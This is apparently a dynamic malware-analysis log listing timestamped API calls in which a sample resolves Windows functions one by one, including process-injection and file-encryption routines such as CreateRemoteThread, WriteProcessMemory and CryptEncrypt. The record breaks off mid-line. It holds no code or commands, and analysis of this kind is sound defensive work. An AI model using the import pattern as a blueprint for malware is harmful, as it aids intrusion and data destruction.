[0081.980] GetProcAddress (hModule=0x759f0000, lpProcName="GetCurrentProcess") returned 0x75a01809 [0081.980] SetErrorMode (uMode=0x8001) returned 0x0 [0081.980] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.980] SetErrorMode (uMode=0x0) returned 0x8001 [0081.980] GetProcAddress (hModule=0x759f0000, lpProcName="SetErrorMode") returned 0x75a01b00 [0081.980] SetErrorMode (uMode=0x8001) returned 0x0 [0081.980] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.980] SetErrorMode (uMode=0x0) returned 0x8001 [0081.980] GetProcAddress (hModule=0x759f0000, lpProcName="GetVersionExW") returned 0x75a01ae5 [0081.980] SetErrorMode (uMode=0x8001) returned 0x0 [0081.980] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.980] SetErrorMode (uMode=0x0) returned 0x8001 [0081.980] GetProcAddress (hModule=0x759f0000, lpProcName="DuplicateHandle") returned 0x75a01886 [0081.980] SetErrorMode (uMode=0x8001) returned 0x0 [0081.980] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.980] SetErrorMode (uMode=0x0) returned 0x8001 [0081.981] GetProcAddress (hModule=0x759f0000, lpProcName="GetModuleHandleA") returned 0x75a01245 [0081.981] SetErrorMode (uMode=0x8001) returned 0x0 [0081.981] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.981] SetErrorMode (uMode=0x0) returned 0x8001 [0081.981] GetProcAddress (hModule=0x759f0000, lpProcName="AddVectoredExceptionHandler") returned 0x772e742b [0081.981] SetErrorMode (uMode=0x8001) returned 0x0 [0081.981] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.981] SetErrorMode (uMode=0x0) returned 0x8001 [0081.981] GetProcAddress (hModule=0x759f0000, lpProcName="ExitProcess") returned 0x75a07a10 [0081.981] SetErrorMode (uMode=0x8001) returned 0x0 [0081.981] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.981] SetErrorMode (uMode=0x0) returned 0x8001 [0081.981] GetProcAddress (hModule=0x759f0000, lpProcName="GetCurrentProcessId") returned 0x75a011f8 [0081.981] SetErrorMode (uMode=0x8001) returned 0x0 [0081.981] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.981] SetErrorMode (uMode=0x0) returned 0x8001 [0081.981] GetProcAddress (hModule=0x759f0000, lpProcName="CopyFileW") returned 0x75a2830d [0081.981] SetErrorMode (uMode=0x8001) returned 0x0 [0081.982] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.982] SetErrorMode (uMode=0x0) returned 0x8001 [0081.982] GetProcAddress (hModule=0x759f0000, lpProcName="lstrcmpiA") returned 0x75a03e8e [0081.982] SetErrorMode (uMode=0x8001) returned 0x0 [0081.982] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.982] SetErrorMode (uMode=0x0) returned 0x8001 [0081.982] GetProcAddress (hModule=0x759f0000, lpProcName="IsWow64Process") returned 0x75a0195e [0081.982] SetErrorMode (uMode=0x8001) returned 0x0 [0081.982] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.982] SetErrorMode (uMode=0x0) returned 0x8001 [0081.982] GetProcAddress (hModule=0x759f0000, lpProcName="FindFirstChangeNotificationW") returned 0x75a1d851 [0081.982] SetErrorMode (uMode=0x8001) returned 0x0 [0081.982] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.982] SetErrorMode (uMode=0x0) returned 0x8001 [0081.982] GetProcAddress (hModule=0x759f0000, lpProcName="FindNextChangeNotification") returned 0x75a25c1e [0081.982] SetErrorMode (uMode=0x8001) returned 0x0 [0081.982] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.982] SetErrorMode (uMode=0x0) returned 0x8001 [0081.983] GetProcAddress (hModule=0x759f0000, lpProcName="IsProcessInJob") returned 0x75a2c7ea [0081.983] SetErrorMode (uMode=0x8001) returned 0x0 [0081.983] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.983] SetErrorMode (uMode=0x0) returned 0x8001 [0081.983] GetProcAddress (hModule=0x759f0000, lpProcName="CreateRemoteThread") returned 0x75a8416b [0081.983] SetErrorMode (uMode=0x8001) returned 0x0 [0081.983] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.983] SetErrorMode (uMode=0x0) returned 0x8001 [0081.983] GetProcAddress (hModule=0x759f0000, lpProcName="CreateNamedPipeW") returned 0x75a8414b [0081.983] SetErrorMode (uMode=0x8001) returned 0x0 [0081.983] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.983] SetErrorMode (uMode=0x0) returned 0x8001 [0081.984] GetProcAddress (hModule=0x759f0000, lpProcName="DisconnectNamedPipe") returned 0x75a841df [0081.984] SetErrorMode (uMode=0x8001) returned 0x0 [0081.984] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.984] SetErrorMode (uMode=0x0) returned 0x8001 [0081.984] GetProcAddress (hModule=0x759f0000, lpProcName="ConnectNamedPipe") returned 0x75a840fb [0081.984] SetErrorMode (uMode=0x8001) returned 0x0 [0081.984] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.984] SetErrorMode (uMode=0x0) returned 0x8001 [0081.984] GetProcAddress (hModule=0x759f0000, lpProcName="GetLogicalDrives") returned 0x75a05371 [0081.984] SetErrorMode (uMode=0x8001) returned 0x0 [0081.984] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.984] SetErrorMode (uMode=0x0) returned 0x8001 [0081.984] GetProcAddress (hModule=0x759f0000, lpProcName="GetDriveTypeW") returned 0x75a0418b [0081.984] SetErrorMode (uMode=0x8001) returned 0x0 [0081.985] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.985] SetErrorMode (uMode=0x0) returned 0x8001 [0081.985] GetProcAddress (hModule=0x759f0000, lpProcName="GetUserDefaultUILanguage") returned 0x75a044ab [0081.985] SetErrorMode (uMode=0x8001) returned 0x0 [0081.985] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.986] SetErrorMode (uMode=0x0) returned 0x8001 [0081.986] GetProcAddress (hModule=0x759f0000, lpProcName="CopyFileExW") returned 0x75a23b92 [0081.986] SetErrorMode (uMode=0x8001) returned 0x0 [0081.986] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.986] SetErrorMode (uMode=0x0) returned 0x8001 [0081.986] GetProcAddress (hModule=0x759f0000, lpProcName="GetEnvironmentVariableW") returned 0x75a01b48 [0081.986] SetErrorMode (uMode=0x8001) returned 0x0 [0081.986] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.986] SetErrorMode (uMode=0x0) returned 0x8001 [0081.986] GetProcAddress (hModule=0x759f0000, lpProcName="SetFilePointer") returned 0x75a017d1 [0081.986] SetErrorMode (uMode=0x8001) returned 0x0 [0081.986] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.986] SetErrorMode (uMode=0x0) returned 0x8001 [0081.987] GetProcAddress (hModule=0x759f0000, lpProcName="InitializeCriticalSection") returned 0x772a2c42 [0081.987] SetErrorMode (uMode=0x8001) returned 0x0 [0081.987] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.987] SetErrorMode (uMode=0x0) returned 0x8001 [0081.987] GetProcAddress (hModule=0x759f0000, lpProcName="GetTimeZoneInformation") returned 0x75a0465a [0081.987] SetErrorMode (uMode=0x8001) returned 0x0 [0081.987] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.987] SetErrorMode (uMode=0x0) returned 0x8001 [0081.987] GetProcAddress (hModule=0x759f0000, lpProcName="MultiByteToWideChar") returned 0x75a0192e [0081.987] SetErrorMode (uMode=0x8001) returned 0x0 [0081.987] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.987] SetErrorMode (uMode=0x0) returned 0x8001 [0081.987] GetProcAddress (hModule=0x759f0000, lpProcName="SetFileAttributesW") returned 0x75a1d4f7 [0081.987] SetErrorMode (uMode=0x8001) returned 0x0 [0081.987] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.987] SetErrorMode (uMode=0x0) returned 0x8001 [0081.987] GetProcAddress (hModule=0x759f0000, lpProcName="GetVolumeNameForVolumeMountPointW") returned 0x75a1052f [0081.987] SetErrorMode (uMode=0x8001) returned 0x0 [0081.988] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.988] SetErrorMode (uMode=0x0) returned 0x8001 [0081.988] GetProcAddress (hModule=0x759f0000, lpProcName="OpenProcess") returned 0x75a01986 [0081.988] SetErrorMode (uMode=0x8001) returned 0x0 [0081.988] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.988] SetErrorMode (uMode=0x0) returned 0x8001 [0081.988] GetProcAddress (hModule=0x759f0000, lpProcName="GetFileTime") returned 0x75a04407 [0081.988] SetErrorMode (uMode=0x8001) returned 0x0 [0081.988] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.988] SetErrorMode (uMode=0x0) returned 0x8001 [0081.988] GetProcAddress (hModule=0x759f0000, lpProcName="ReleaseMutex") returned 0x75a0111e [0081.988] SetErrorMode (uMode=0x8001) returned 0x0 [0081.988] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.988] SetErrorMode (uMode=0x0) returned 0x8001 [0081.988] GetProcAddress (hModule=0x759f0000, lpProcName="LeaveCriticalSection") returned 0x77292270 [0081.988] SetErrorMode (uMode=0x8001) returned 0x0 [0081.988] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.989] SetErrorMode (uMode=0x0) returned 0x8001 [0081.989] GetProcAddress (hModule=0x759f0000, lpProcName="GetModuleFileNameW") returned 0x75a04950 [0081.989] SetErrorMode (uMode=0x8001) returned 0x0 [0081.989] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.989] SetErrorMode (uMode=0x0) returned 0x8001 [0081.989] GetProcAddress (hModule=0x759f0000, lpProcName="SetFileTime") returned 0x75a1ecbb [0081.989] SetErrorMode (uMode=0x8001) returned 0x0 [0081.989] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.989] SetErrorMode (uMode=0x0) returned 0x8001 [0081.989] GetProcAddress (hModule=0x759f0000, lpProcName="RemoveDirectoryW") returned 0x75a844cf [0081.989] SetErrorMode (uMode=0x8001) returned 0x0 [0081.989] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.989] SetErrorMode (uMode=0x0) returned 0x8001 [0081.989] GetProcAddress (hModule=0x759f0000, lpProcName="VirtualAlloc") returned 0x75a01856 [0081.989] SetErrorMode (uMode=0x8001) returned 0x0 [0081.989] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.989] SetErrorMode (uMode=0x0) returned 0x8001 [0081.990] GetProcAddress (hModule=0x759f0000, lpProcName="ExpandEnvironmentStringsW") returned 0x75a04173 [0081.990] SetErrorMode (uMode=0x8001) returned 0x0 [0081.990] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.990] SetErrorMode (uMode=0x0) returned 0x8001 [0081.990] GetProcAddress (hModule=0x759f0000, lpProcName="WriteFile") returned 0x75a01282 [0081.990] SetErrorMode (uMode=0x8001) returned 0x0 [0081.990] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.990] SetErrorMode (uMode=0x0) returned 0x8001 [0081.990] GetProcAddress (hModule=0x759f0000, lpProcName="FindNextFileW") returned 0x75a054ee [0081.990] SetErrorMode (uMode=0x8001) returned 0x0 [0081.990] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.990] SetErrorMode (uMode=0x0) returned 0x8001 [0081.990] GetProcAddress (hModule=0x759f0000, lpProcName="EnterCriticalSection") returned 0x772922b0 [0081.990] SetErrorMode (uMode=0x8001) returned 0x0 [0081.990] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.990] SetErrorMode (uMode=0x0) returned 0x8001 [0081.990] GetProcAddress (hModule=0x759f0000, lpProcName="GetFileAttributesW") returned 0x75a01b18 [0081.990] SetErrorMode (uMode=0x8001) returned 0x0 [0081.991] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.991] SetErrorMode (uMode=0x0) returned 0x8001 [0081.991] GetProcAddress (hModule=0x759f0000, lpProcName="FindClose") returned 0x75a04442 [0081.991] SetErrorMode (uMode=0x8001) returned 0x0 [0081.991] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.991] SetErrorMode (uMode=0x0) returned 0x8001 [0081.991] GetProcAddress (hModule=0x759f0000, lpProcName="OpenEventW") returned 0x75a015d6 [0081.991] SetErrorMode (uMode=0x8001) returned 0x0 [0081.991] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.991] SetErrorMode (uMode=0x0) returned 0x8001 [0081.991] GetProcAddress (hModule=0x759f0000, lpProcName="GetTempPathW") returned 0x75a1d4dc [0081.991] SetErrorMode (uMode=0x8001) returned 0x0 [0081.991] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.991] SetErrorMode (uMode=0x0) returned 0x8001 [0081.991] GetProcAddress (hModule=0x759f0000, lpProcName="SetLastError") returned 0x75a011a9 [0081.991] SetErrorMode (uMode=0x8001) returned 0x0 [0081.991] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.992] SetErrorMode (uMode=0x0) returned 0x8001 [0081.992] GetProcAddress (hModule=0x759f0000, lpProcName="HeapFree") returned 0x75a014c9 [0081.992] SetErrorMode (uMode=0x8001) returned 0x0 [0081.992] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.992] SetErrorMode (uMode=0x0) returned 0x8001 [0081.992] GetProcAddress (hModule=0x759f0000, lpProcName="HeapCreate") returned 0x75a04a2d [0081.992] SetErrorMode (uMode=0x8001) returned 0x0 [0081.992] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.992] SetErrorMode (uMode=0x0) returned 0x8001 [0081.992] GetProcAddress (hModule=0x759f0000, lpProcName="WriteProcessMemory") returned 0x75a1d9e0 [0081.992] SetErrorMode (uMode=0x8001) returned 0x0 [0081.992] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.992] SetErrorMode (uMode=0x0) returned 0x8001 [0081.992] GetProcAddress (hModule=0x759f0000, lpProcName="GetFileSizeEx") returned 0x75a059e2 [0081.992] SetErrorMode (uMode=0x8001) returned 0x0 [0081.992] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.992] SetErrorMode (uMode=0x0) returned 0x8001 [0081.992] GetProcAddress (hModule=0x759f0000, lpProcName="FindFirstFileW") returned 0x75a04435 [0081.993] SetErrorMode (uMode=0x8001) returned 0x0 [0081.993] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.993] SetErrorMode (uMode=0x0) returned 0x8001 [0081.993] GetProcAddress (hModule=0x759f0000, lpProcName="InterlockedExchange") returned 0x75a01462 [0081.993] SetErrorMode (uMode=0x8001) returned 0x0 [0081.993] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.993] SetErrorMode (uMode=0x0) returned 0x8001 [0081.993] GetProcAddress (hModule=0x759f0000, lpProcName="GetVolumeInformationW") returned 0x75a1c860 [0081.993] SetErrorMode (uMode=0x8001) returned 0x0 [0081.993] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.993] SetErrorMode (uMode=0x0) returned 0x8001 [0081.993] GetProcAddress (hModule=0x759f0000, lpProcName="ReadFile") returned 0x75a03ed3 [0081.993] SetErrorMode (uMode=0x8001) returned 0x0 [0081.993] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.993] SetErrorMode (uMode=0x0) returned 0x8001 [0081.993] GetProcAddress (hModule=0x759f0000, lpProcName="CreateDirectoryW") returned 0x75a04259 [0081.993] SetErrorMode (uMode=0x8001) returned 0x0 [0081.993] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.994] SetErrorMode (uMode=0x0) returned 0x8001 [0081.994] GetProcAddress (hModule=0x759f0000, lpProcName="FreeLibrary") returned 0x75a034c8 [0081.994] SetErrorMode (uMode=0x8001) returned 0x0 [0081.994] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.994] SetErrorMode (uMode=0x0) returned 0x8001 [0081.994] GetProcAddress (hModule=0x759f0000, lpProcName="GetModuleHandleW") returned 0x75a034b0 [0081.994] SetErrorMode (uMode=0x8001) returned 0x0 [0081.994] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.994] SetErrorMode (uMode=0x0) returned 0x8001 [0081.994] GetProcAddress (hModule=0x759f0000, lpProcName="GetProcAddress") returned 0x75a01222 [0081.994] SetErrorMode (uMode=0x8001) returned 0x0 [0081.994] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.994] SetErrorMode (uMode=0x0) returned 0x8001 [0081.994] GetProcAddress (hModule=0x759f0000, lpProcName="LoadLibraryW") returned 0x75a0492b [0081.994] SetErrorMode (uMode=0x8001) returned 0x0 [0081.994] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.994] SetErrorMode (uMode=0x0) returned 0x8001 [0081.994] GetProcAddress (hModule=0x759f0000, lpProcName="Process32FirstW") returned 0x75a28baf [0081.995] SetErrorMode (uMode=0x8001) returned 0x0 [0081.995] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.995] SetErrorMode (uMode=0x0) returned 0x8001 [0081.995] GetProcAddress (hModule=0x759f0000, lpProcName="Process32NextW") returned 0x75a2896c [0081.995] SetErrorMode (uMode=0x8001) returned 0x0 [0081.995] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.995] SetErrorMode (uMode=0x0) returned 0x8001 [0081.995] GetProcAddress (hModule=0x759f0000, lpProcName="GetLastError") returned 0x75a011c0 [0081.995] SetErrorMode (uMode=0x8001) returned 0x0 [0081.995] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.995] SetErrorMode (uMode=0x0) returned 0x8001 [0081.995] GetProcAddress (hModule=0x759f0000, lpProcName="CreateToolhelp32Snapshot") returned 0x75a2735f [0081.995] SetErrorMode (uMode=0x8001) returned 0x0 [0081.995] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.995] SetErrorMode (uMode=0x0) returned 0x8001 [0081.995] GetProcAddress (hModule=0x759f0000, lpProcName="CreateFileW") returned 0x75a03f5c [0081.995] SetErrorMode (uMode=0x8001) returned 0x0 [0081.995] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.996] SetErrorMode (uMode=0x0) returned 0x8001 [0081.996] GetProcAddress (hModule=0x759f0000, lpProcName="CreateMutexW") returned 0x75a0424c [0081.996] SetErrorMode (uMode=0x8001) returned 0x0 [0081.996] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.996] SetErrorMode (uMode=0x0) returned 0x8001 [0081.996] GetProcAddress (hModule=0x759f0000, lpProcName="ResetEvent") returned 0x75a016dd [0081.996] SetErrorMode (uMode=0x8001) returned 0x0 [0081.996] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.996] SetErrorMode (uMode=0x0) returned 0x8001 [0081.996] GetProcAddress (hModule=0x759f0000, lpProcName="CloseHandle") returned 0x75a01410 [0081.996] SetErrorMode (uMode=0x8001) returned 0x0 [0081.996] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.996] SetErrorMode (uMode=0x0) returned 0x8001 [0081.996] GetProcAddress (hModule=0x759f0000, lpProcName="SetEvent") returned 0x75a016c5 [0081.996] SetErrorMode (uMode=0x8001) returned 0x0 [0081.996] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.996] SetErrorMode (uMode=0x0) returned 0x8001 [0081.997] GetProcAddress (hModule=0x759f0000, lpProcName="Sleep") returned 0x75a010ff [0081.997] SetErrorMode (uMode=0x8001) returned 0x0 [0081.997] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.997] SetErrorMode (uMode=0x0) returned 0x8001 [0081.997] GetProcAddress (hModule=0x759f0000, lpProcName="CreateEventW") returned 0x75a0183e [0081.997] SetErrorMode (uMode=0x8001) returned 0x0 [0081.997] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.997] SetErrorMode (uMode=0x0) returned 0x8001 [0081.997] GetProcAddress (hModule=0x759f0000, lpProcName="WaitForSingleObject") returned 0x75a01136 [0081.997] SetErrorMode (uMode=0x8001) returned 0x0 [0081.997] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.997] SetErrorMode (uMode=0x0) returned 0x8001 [0081.997] GetProcAddress (hModule=0x759f0000, lpProcName="WaitForMultipleObjects") returned 0x75a04220 [0081.997] SetErrorMode (uMode=0x8001) returned 0x0 [0081.997] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.997] SetErrorMode (uMode=0x0) returned 0x8001 [0081.997] GetProcAddress (hModule=0x759f0000, lpProcName="GetTickCount") returned 0x75a0110c [0081.997] SetErrorMode (uMode=0x8001) returned 0x0 [0081.997] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.998] SetErrorMode (uMode=0x0) returned 0x8001 [0081.998] GetProcAddress (hModule=0x759f0000, lpProcName="VirtualFree") returned 0x75a0186e [0081.998] SetErrorMode (uMode=0x8001) returned 0x0 [0081.998] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x75790000 [0081.998] SetErrorMode (uMode=0x0) returned 0x8001 [0081.998] GetProcAddress (hModule=0x75790000, lpProcName="GetIconInfo") returned 0x757b49ea [0081.998] SetErrorMode (uMode=0x8001) returned 0x0 [0081.998] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x75790000 [0081.998] SetErrorMode (uMode=0x0) returned 0x8001 [0081.998] GetProcAddress (hModule=0x75790000, lpProcName="DrawIcon") returned 0x757b8deb [0081.998] SetErrorMode (uMode=0x8001) returned 0x0 [0081.998] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x75790000 [0081.998] SetErrorMode (uMode=0x0) returned 0x8001 [0081.998] GetProcAddress (hModule=0x75790000, lpProcName="LoadImageW") returned 0x757afbd1 [0081.998] SetErrorMode (uMode=0x8001) returned 0x0 [0081.998] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x75790000 [0081.998] SetErrorMode (uMode=0x0) returned 0x8001 [0081.999] GetProcAddress (hModule=0x75790000, lpProcName="GetCursorPos") returned 0x757b1218 [0081.999] SetErrorMode (uMode=0x8001) returned 0x0 [0081.999] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x75790000 [0081.999] SetErrorMode (uMode=0x0) returned 0x8001 [0081.999] GetProcAddress (hModule=0x75790000, lpProcName="DefWindowProcW") returned 0x772a25dd [0081.999] SetErrorMode (uMode=0x8001) returned 0x0 [0081.999] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x75790000 [0081.999] SetErrorMode (uMode=0x0) returned 0x8001 [0081.999] GetProcAddress (hModule=0x75790000, lpProcName="CreateWindowExW") returned 0x757a8a29 [0081.999] SetErrorMode (uMode=0x8001) returned 0x0 [0081.999] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x75790000 [0081.999] SetErrorMode (uMode=0x0) returned 0x8001 [0081.999] GetProcAddress (hModule=0x75790000, lpProcName="UnregisterClassW") returned 0x757a9f84 [0081.999] SetErrorMode (uMode=0x8001) returned 0x0 [0081.999] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x75790000 [0081.999] SetErrorMode (uMode=0x0) returned 0x8001 [0082.000] GetProcAddress (hModule=0x75790000, lpProcName="GetKeyboardLayoutList") returned 0x757b2e69 [0082.000] SetErrorMode (uMode=0x8001) returned 0x0 [0082.000] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x75790000 [0082.000] SetErrorMode (uMode=0x0) returned 0x8001 [0082.000] GetProcAddress (hModule=0x75790000, lpProcName="CharLowerA") returned 0x757b3e75 [0082.000] SetErrorMode (uMode=0x8001) returned 0x0 [0082.000] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x75790000 [0082.000] SetErrorMode (uMode=0x0) returned 0x8001 [0082.000] GetProcAddress (hModule=0x75790000, lpProcName="CharToOemW") returned 0x75801a26 [0082.000] SetErrorMode (uMode=0x8001) returned 0x0 [0082.000] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x75790000 [0082.000] SetErrorMode (uMode=0x0) returned 0x8001 [0082.000] GetProcAddress (hModule=0x75790000, lpProcName="TranslateMessage") returned 0x757a7809 [0082.000] SetErrorMode (uMode=0x8001) returned 0x0 [0082.000] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x75790000 [0082.000] SetErrorMode (uMode=0x0) returned 0x8001 [0082.000] GetProcAddress (hModule=0x75790000, lpProcName="PeekMessageW") returned 0x757b05ba [0082.000] SetErrorMode (uMode=0x8001) returned 0x0 [0082.001] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x75790000 [0082.001] SetErrorMode (uMode=0x0) returned 0x8001 [0082.001] GetProcAddress (hModule=0x75790000, lpProcName="DispatchMessageW") returned 0x757a787b [0082.001] SetErrorMode (uMode=0x8001) returned 0x0 [0082.001] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x75790000 [0082.001] SetErrorMode (uMode=0x0) returned 0x8001 [0082.001] GetProcAddress (hModule=0x75790000, lpProcName="MsgWaitForMultipleObjects") returned 0x757b0b4a [0082.001] SetErrorMode (uMode=0x8001) returned 0x0 [0082.001] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x75790000 [0082.001] SetErrorMode (uMode=0x0) returned 0x8001 [0082.001] GetProcAddress (hModule=0x75790000, lpProcName="RegisterClassExW") returned 0x757ab17d [0082.001] SetErrorMode (uMode=0x8001) returned 0x0 [0082.001] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x75790000 [0082.001] SetErrorMode (uMode=0x0) returned 0x8001 [0082.001] GetProcAddress (hModule=0x75790000, lpProcName="SetWindowLongA") returned 0x757b6110 [0082.001] SetErrorMode (uMode=0x8001) returned 0x0 [0082.001] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x75790000 [0082.002] SetErrorMode (uMode=0x0) returned 0x8001 [0082.002] GetProcAddress (hModule=0x75790000, lpProcName="GetWindowLongA") returned 0x757ad156 [0082.002] SetErrorMode (uMode=0x8001) returned 0x0 [0082.002] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x75790000 [0082.002] SetErrorMode (uMode=0x0) returned 0x8001 [0082.002] GetProcAddress (hModule=0x75790000, lpProcName="CharUpperW") returned 0x757af350 [0082.002] SetErrorMode (uMode=0x8001) returned 0x0 [0082.002] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x75790000 [0082.002] SetErrorMode (uMode=0x0) returned 0x8001 [0082.002] GetProcAddress (hModule=0x75790000, lpProcName="DestroyWindow") returned 0x757a9a55 [0082.002] SetErrorMode (uMode=0x8001) returned 0x0 [0082.002] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x758d0000 [0082.167] SetErrorMode (uMode=0x0) returned 0x8001 [0082.167] GetProcAddress (hModule=0x758d0000, lpProcName="CryptImportPublicKeyInfo") returned 0x758e6c0e [0082.168] SetErrorMode (uMode=0x8001) returned 0x0 [0082.168] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x758d0000 [0082.168] SetErrorMode (uMode=0x0) returned 0x8001 [0082.168] GetProcAddress (hModule=0x758d0000, lpProcName="CryptDecodeObjectEx") returned 0x758dd718 [0082.168] SetErrorMode (uMode=0x8001) returned 0x0 [0082.168] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x756e0000 [0082.168] SetErrorMode (uMode=0x0) returned 0x8001 [0082.168] GetProcAddress (hModule=0x756e0000, lpProcName="RegCloseKey") returned 0x756f469d [0082.168] SetErrorMode (uMode=0x8001) returned 0x0 [0082.168] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x756e0000 [0082.168] SetErrorMode (uMode=0x0) returned 0x8001 [0082.168] GetProcAddress (hModule=0x756e0000, lpProcName="GetAce") returned 0x756f45f0 [0082.168] SetErrorMode (uMode=0x8001) returned 0x0 [0082.169] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x756e0000 [0082.169] SetErrorMode (uMode=0x0) returned 0x8001 [0082.169] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x7570779b [0082.169] SetErrorMode (uMode=0x8001) returned 0x0 [0082.169] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x756e0000 [0082.169] SetErrorMode (uMode=0x0) returned 0x8001 [0082.169] GetProcAddress (hModule=0x756e0000, 